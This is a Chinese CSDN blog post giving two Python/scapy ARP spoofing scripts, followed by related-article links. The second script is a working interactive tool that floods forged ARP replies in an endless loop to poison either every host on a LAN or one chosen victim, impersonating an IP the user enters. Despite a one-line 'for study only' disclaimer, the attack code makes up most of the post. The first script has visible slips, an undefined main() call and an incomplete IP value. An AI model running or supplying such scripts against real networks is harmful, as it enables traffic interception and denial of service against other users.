ARP欺骗

已于 2022-09-24 15:27:16 修改
阅读量206 收藏 1
点赞数
分类专栏: # 网络安全(攻击向) python
于 2022-09-24 15:15:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jzttly/article/details/127025515
版权

网络 python 开发语言

ARP欺骗

前言

记录一些学习经验、遇到的问题
仅用于对协议报文学习,了解攻击原理,请勿用于恶意攻击

一、基础设置

1.ARP欺骗(版本1)

1、初始版本,需要在文件里面手动更改对应MAC和IP

from scapy.all import *
from scapy.layers.l2 import ARP, Ether

### 查询单个IP的MAC地址
def arp1():
    arpsrc = "11:11:11:11:11:11"    		# 虚假对象的MAC地址
    arpdst = "ff:ff:ff:ff:ff:ff"    		# 攻击的对象MAC地址(广播攻击所有机器)
    arpdst = "22:22:22:22:22:22" 			# 攻击的对象MAC地址(攻击特定主机)
    arpsrcip = "192.168.1."  				# 虚假对象的IP
    arpdstip = "192.168.1.1" 				# 攻击对象的IP

    arpPkt = Ether(dst=arpdst,src=arpsrc) / ARP(psrc=arpsrcip,hwsrc=arpsrc,pdst=arpdstip,hwdst=arpdst,op=2) 
    # 报文格式:Ether的dst为攻击对象,ARP的op=2为reply报
    # 发送arp请求,并获取响应结果。设置1s超时。
    res = srp1(arpPkt, timeout=1, verbose=1)  # srp1发送并接受,timeout 超时丢弃,verbose 显示详细内容

if __name__ == '__main__':
    main()

2.ARP欺骗(版本2)

1、dos界面
2、两种攻击模式(①无差别,②特定主机)
3、判断IP地址格式

from scapy.all import *
from scapy.layers.l2 import ARP, Ether


### 查询单个IP的MAC地址
def arp_attack():
    while True:
        print("攻击模式:1、无差别攻击。2、特定主机")
        attackmode = input()  # 输入攻击模式
        if attackmode == "1":  # 调用
            attack_mode1()
            break
        elif attackmode == "2":
            attack_mode2()
            break
        else:
            print("输入错误,请重新输入")


### 攻击模式:1、无差别攻击
def attack_mode1():
    localip = socket.gethostbyname(socket.gethostname())  # 获取本机ip
    arpPkt = Ether() / ARP(pdst=localip)
    res = srp1(arpPkt, timeout=1)  # 发送arp查询本机IP的MAC地址
    arpsrcmac = res.hwsrc  # 本机MAC地址
    arpsrcip = judge_ip("请输入要伪装那一台主机IP:")   # 伪装的IP

    arpdstmac = "ff:ff:ff:ff:ff:ff"  # 攻击的对象MAC地址(广播攻击所有机器)
    arpdstip = ""
    attack_message(1, arpsrcmac, arpdstmac, arpsrcip, arpdstip)


### 攻击模式:2、特定主机
def attack_mode2():
    localip = socket.gethostbyname(socket.gethostname())  # 获取本机ip
    arpPkt = Ether() / ARP(pdst=localip)
    res = srp1(arpPkt, timeout=1)  # 发送arp查询本机IP的MAC地址
    arpsrcmac = res.hwsrc  # 本机MAC地址
    arpsrcip = judge_ip("请输入要伪装那一台主机IP:")   # 伪装的IP
    arpdstip = judge_ip("请输入要欺骗主机的IP地址:")   # 欺骗的IP
    arpPkt = Ether() / ARP(pdst=arpdstip)
    res = srp1(arpPkt, timeout=1)  # 发送arp查询要欺骗主机IP的MAC地址
    arpdstmac = res.hwsrc  # 攻击的对象MAC地址
    attack_message(2, arpsrcmac, arpdstmac, arpsrcip, arpdstip)


### 发送攻击报文
def attack_message(attackmode, arpsrcmac, arpdstmac, arpsrcip, arpdstip):
    if attackmode == 1:  # 无限循环发送广博包欺骗
        arpPkt = Ether(dst=arpdstmac) / ARP(psrc=arpsrcip, hwsrc=arpsrcmac, op=2)  # 报文格式:Ether的dst为攻击对象,ARP的op=2为reply报
        res = srploop(arpPkt, timeout=1)  # srploop循环发送并接受,timeout 超时丢弃,verbose 显示详细内容
    if attackmode == 2:  # 无限循环发送广博包欺骗
        arpPkt = Ether(dst=arpdstmac,src=arpsrcmac) / ARP(psrc=arpsrcip,hwsrc=arpsrcmac,pdst=arpdstip,hwdst=arpdstmac,op=2)  # 报文格式:Ether的dst为攻击对象,ARP的op=2为reply报
        res = srploop(arpPkt, timeout=1)  # srploop循环发送并接受,timeout 超时丢弃,verbose 显示详细内容


### 判断IP地址是否合适
def judge_ip(str1):
    while True:
        print(str1)
        arpdstip = input()

        # 判断是否是否是有效IP地址格式
        a = arpdstip.split(r".")
        if len(a) == 4:  # 判断是否为四个段落
            for i in a:  # 拆分判断
                if not i.isdigit() or int(i) < 0 or int(i) > 255:  # 不为数字,不小于0,不大于255
                    print("输入错误" + arpdstip + "不符合IP地址格式,请重新输入")
                    arpdstip = None
                    break
            if not arpdstip is None:  # 经过多重检查后判断输入是否正常
                break
        else:
            print("输入错误" + arpdstip + "不符合IP地址格式,请重新输入")
    return arpdstip

if __name__ == '__main__':
    arp_attack()
jzttly
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ensp加kali实现arp欺骗攻击
04-21
网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
网络攻击手段之-----ARP欺骗
qq_53058639的博客
01-29 1634
本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP的欺骗攻击,ARP 欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行ARP 欺骗攻击。做一个遵纪守法的公民,从我做起!!!ARP (Address Resolution Protocol) 是一种网络层协议,用于将 IP 地址转换为物理地址(MAC地址)。在局域网中,每台设备都有唯一的 MAC 地址,而 IP 地址是可以重复分配的。因此,当一个设备需要发送数据到另一个设备时,它需要知道另一个设备的MAC 地址。
Python 协议攻击脚本(五): ARP欺骗 Arpspoof
酉酉的博客
04-28 3337
ARP arp协议 ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。 arp欺骗 ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MA...
Python 实现ARP与DNS欺骗
CSDN
05-28 5363
Scapy是一个Python编写的强大网络数据包处理库,它提供了创建、发送、解析和操作网络数据包的功能。Scapy允许开发人员以编程方式构建各种类型的网络工具和应用,包括网络扫描、协议分析、网络攻击和防御等。
交换网络中的嗅探和ARP欺骗
FreeXploiT
10-31 1728
创建时间:2002-04-11文章属性:原创文章来源:www.opengram.com文章提交:refdom (refdom_at_263.net)Author: Refdom Email:  refdom@263.netHomePage: http://www.opengram.com2002-4-6   以太网内的嗅探(sniff)对于网络安全来说并不是什么好事,虽然对于网络管理员能够跟踪数据
什么是ARP欺骗ARP欺骗现象是什么?如何判断ARP欺骗
10-01
因为在进行通信的时候,数据是通过MAC地址与IP地址的对应关系来进行转发的。若其中MAC地址与IP地址对应的关系出错,就会导致数据...通过某种手段,来更改MAC与IP地址的对应关系,导致电脑无法正常上网,这就是ARP欺骗
新建文件夹_arp欺骗_
10-02
根据 ARP 欺骗的原理,设计网管欺骗程序,编写代码实现对内网 PC 的欺骗。 首先检索网络设备列表,遍历并将所有的设备列表打印出来,选择所要欺骗的网 络设备打开其适配器,判断链路层类型是否为以太网,存下子网...
ArpSpoof-arp欺骗.rar
04-03
《ArpSpoof-arp欺骗.rar》是一款专用于Windows系统的ARP欺骗工具,它涉及到了网络通信中的重要概念和安全问题。ARP(Address Resolution Protocol)即地址解析协议,是TCP/IP协议栈中的一个关键组件,主要负责将IP...
实现arp欺骗的源代码以及详细解释
12-01
在实现TCP/IP协议的网络环境下,一个ip包走到哪里,要怎么走是靠路由表定义,但是,当ip包到达该网络后,哪台机器响应这个ip包却是靠该ip包中所包含的硬件mac地址来识别。也就是说,只有机器的硬件mac地址和该ip包中的硬件mac地址相同的机器才会应答这个ip包,因为在网络中,每一台主机都会有发送ip包的时候,所以,在每台主机的内存中,都有一个 arp--> 硬件mac 的转换表。通常是动态的转换表(该arp表可以手工添加静态条目)。也就是说,该对应表会被主机在一定的时间间隔后刷新。这个时间间隔就是ARP高速缓存的超时时间。 通常主机在发送一个ip包之前,它要到该转换表中寻找和ip包对应的硬件mac地址,如果没有找到,该主机就发送一个ARP广播包,于是,主机刷新自己的ARP缓存。然后发出该ip包。
语言ARP欺骗攻击
08-20
语言ARP欺骗攻击源码系统结构:随机MAC,获取MAC,探测停止,ARP欺骗,Ping探测,自定义ARP,API_SendARP,API_inet_addr, ======程序集1 || ||------_启动子程序 || || ======窗口程序集1 || ||------_DLL_局域网_创建
Python基于scapy完成ARP欺骗
qq_53830529的博客
05-18 616
使用python的scapy库模拟ARP欺骗,实现让被攻击主机的流量也能让攻击主机抓取
ARP欺骗的实现
laidie的博客
06-28 136
阅读本篇建议先阅读上一章的知识点。
ARP攻击原理和kali实现ARP攻击
热门推荐
cuttleKK的博客
10-28 1万+
目录一、ARP协议和ARP攻击1.ARP协议2.利用wireshark分析ARP数据包3.ARP攻击二、kali实现ARP攻击 一、ARP协议和ARP攻击 1.ARP协议 ARP协议,地址解析协议(Address Resolution Protocol),用来实现IP地址到物理地址的映射。 每一台主机都设有一个ARP高速缓存(ARP cache),里面有本局域网上的各主机和路由器的IP地址到硬件地址的映射表,主机如何获取这些地址的? 例如,主机A向本局域网上的某台主机B发送IP数据报时,要先在ARP高速缓存
MAC本遭遇ARP攻击的处理办法
weixin_33836223的博客
01-13 250
windows环境下,如果遭遇ARP攻击,解决方法很简单:“360安全卫士”或"QQ软件管理"的实时防护里,都有ARP防护功能(默认是关闭的),只要启用就行了。但是Mac本上,就没这么方便了,先大概说下ARP攻击的原理:我们在局域网中访问外网时,总是要经过网关才能出去,IP设置里网关设置的是一个具体的ip4地址(比如192.168.1.1),但是IP地址每台机器通常是可以随便设置的(只要不跟局域网...
pythonarp工具_Python 实现ARP扫描欺骗工具
weixin_39900531的博客
12-05 423
实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址.from scapy.all import *from optparse import OptionParserimport threadingdef parse_ip(targets):_split = targets.split('-')first_ip =...
arp攻击(arp攻击解决办法)
keven_zeng的专栏
04-20 2535
http://www.heibai.net/articles/defense/fangyujiqiao/2010/0929/10229.html 如果你发现经常网络掉线,或者发现自己的网站所有页面都被挂马,但到服务器上,查看页面源代码,却找不到挂马代码,就要考虑到是否自己机器或者同一IP段中其他机器是否中了ARP病毒。除了装ARP防火墙以外,还可以通过绑定网关的IP和MAC来预防一下。这
ARP协议(5)ARP攻击和防护
xiongxianhe的专栏
07-14 1751
一、ARP攻击 我们先来看ARP的功能:ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。 ARP的具体实现方式,我在《ARP协议(1)什么是ARP协议》已有说明: Q:这张映射表是如何生成的? A: (1)这张表中,每条记录(非静态)的生存时间一般为20分钟,起始时间从被创建开始算起,一旦过期,将在这张表中删除。(手动删除全部,可以用
浏览器发送HTTP请求的过程
最新发布
学Python的小白!
08-25 1252
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
ARP欺骗程序设计与实现
"ARP欺骗设计" ARP欺骗设计报告详尽阐述了如何实现一个ARP欺骗程序,涉及网络攻击与防御技术的实践。ARP(地址解析协议)是TCP/IP协议栈中的一个重要组成部分,它负责将IP地址转换为物理(MAC)地址,以确保网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值